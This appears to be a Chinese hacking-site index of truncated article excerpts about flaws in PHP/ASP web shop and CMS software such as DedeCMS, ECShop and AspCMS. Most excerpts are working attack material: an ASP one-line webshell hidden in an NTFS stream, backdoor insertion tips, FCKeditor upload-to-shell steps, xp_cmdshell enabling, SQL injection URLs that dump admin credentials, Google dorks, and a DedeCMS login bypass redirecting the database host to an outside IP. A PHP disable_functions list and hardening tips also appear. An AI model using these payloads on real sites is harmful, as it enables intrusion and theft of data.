ECSHOP php商城系统过滤不严导致SQL注入漏洞
影响版本: ECSHOP 2.7.2 Release 0604 程序介绍: ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。 漏洞分析: 在include_libcommon.php中存在如下函数
PHP Code复制内容到剪贴板
function g ...
科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具第二版
我就随便改进了下,希望用的到的朋友可以收藏。
第二版改进:
1.检测2条漏洞
2.解决access数据库也出现什么差异备份等脚本上需要优化的问题。
其他也没什么了。
本文转载自『半坑土农民's Blog』科讯kesion 6.x – 7.06 SQL VBS Exp 第二版 ...
php disable_functions 函数列表
禁用不安全的PHP函数,有些php函数是不够安全的,我们必须要加强安全配置,如果做虚拟主机,建议禁止php函数列表如下: 复制代码代码如下: disable_functions = system,exec,shell_exec,passthru,proc_open,proc_close, proc_get_status,checkdnsrr,getmxrr,getservbyname,getservbyport, syslog,popen,show_source,highlight_fi ...
利用ntfs流隐藏你的一句话木马的方法
这是利用NTFS流隐藏你的一句话小马,这方法,文件写入后,不容易给发现,隐藏性好!如下是ASP脚本的例子!NTFS流文件的内容如下<%re= request("test")if re <>"" then execute re response.end '表示结束,不再处理别的代码end if%>把内容写入如下位置(示例位置)H:\Web\动易\Inc:1.jpg
看清楚,是&n ...
php后台插一句话后门的思路分享
首先介绍下php的各种标签: 1): <?php ?> demo: <?php echo "test";?> 这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了! 2): <? echo "test"; ?> 这种标签是在以前很普遍的一种用法php 老版本开发的cms大多都是用的它, 大多程序员都是很熟悉的!我们把这种标签称为短语标签! 3): <script ...
FCKeditor上传Getshell不要忘记htaccess
1.创建一个.htaccess文件,内容如下: <FilesMatch "_php.gif"> SetHandler application/x-httpd-php </FilesMatch> 2.上传shell www.badguest.cn FCKeditor/editor/filemanager/upload/test.html FCKeditor/editor/filemanager/browser/default/connectors/test.html 这是上传地址,然后将你的webshell文件改后缀shell.php ...
MSSQL2008一句话启用xp_cmdshell
SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
幸运的是:只要该扩展存 ...
dedecms官方模板包含一句话后门木马
现在的黑客多胆大包天啊,在天朝居然敢干这种明目张胆的事情。
应该是前几天出的那个dedecms的0day.官方的网站被日,然后被在风格模板里面值入
了一句话木马。XXOO。这年头啥多靠不住。”官方”也一样!你懂得的?
另外一个目录也有。
有在织梦官方下过模板的同学快看看吧。
BY:TOOLS论坛。
...
MYSQL_OUTPUT 脱裤(脱库)通用脚本(修正版)
复制代码代码如下: <html> <head> <title>:: hExI3_Securi7y_TeAm...SCRIPT_FILENAME : <?=$_SERVER["PHP_SELF"]?></title> <style type="text/css"> .font{ size : 2px; } </style> </head> <body> <h4>Mysql Database on Tables to Txt...</h4> #_E-mail:go_root#Hotmail.com #_Author:HYrz --------------------------- ...
aspcms企业建站系统0day漏洞介绍
漏洞出现在 /plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转,所以要快,建议用快捷键复制 爆用户名 /plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+wh ...
IPC$ 扫描和IPC$漏洞的防范小结
IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。简单点说就是通过你的系统帐号和密码登陆你的系统的一个通道!而 IPC$ 并不算是一个漏洞,但因一般电脑用户设置系统的密码为空,这就成为一个可给利用的漏洞了!别人用管理员权限的帐号和空密码登陆你的系统后,别人就可以开共享 ...
常用的一些注入命令 方便一下大家
我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢! //看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- //检测是否有读取某数据库的权限 and 1= (Select HAS_DBACCESS('master')) And c ...
DEDECMS 爆严重安全漏洞 免账号密码直接进入后台
入侵步骤如下:http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root 把上面validate后面的字母改为当前的验证码,即可直接进入网 ...
分享几个WebSite网站防黑经验
1 .设置严密权限 上传目录只给写入、读取权限绝对不能给执行权限 每个网站WebSite使用独立用户名和密码权限设置为Guest 命令: net localgroup users myweb /del 设置MSSQL、Apache、MySQL以Guest权限运行:在运行中打:service.msc选择相应服务以个Guest权限账户运行 2.防止SQL注入 以前用通用防注入模块后来在多次和黑客血和 ...
DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)
DedeCmsV5.6 本地包含 DedeCmsV5.6 本地包含 http://t00ls.net/thread-8608-1-1.html 之前就发现了这本地包含的利用方法。 复制代码代码如下:<form action="http://localhost:8090/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post" method="post" enctype="multipart/form-dat ...
DEDECMS 5.6最新Get Shell漏洞 DEDECMS 5.3/5.6
DEDECMS 5.6最新Get Shell漏洞 影响版本: DEDECMS 5.3/5.6 漏洞描述: DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站 ...
dedecms v5.6 GBK 注入漏洞利用(member/index.php)
EXP: htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'; 会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS EXP: htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7' ...
DedeCms V5.6漏洞 变量未初始化 导致鸡助漏洞
漏洞描述: 健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。 plus/adva ...
讯时漏洞一小结
以下本文总结来自黑防去年第9期杂志上的内容...
先说一个注入吧:http://www.xx.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
这里一个注入
效果如图:
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现 ...
讯时系统(xuas)最新通杀漏洞0day图文说明
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
1、/admin/admin_news_pl_view.asp?id=1//id任意 填入以下语句
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
爆出管理员帐号和密 ...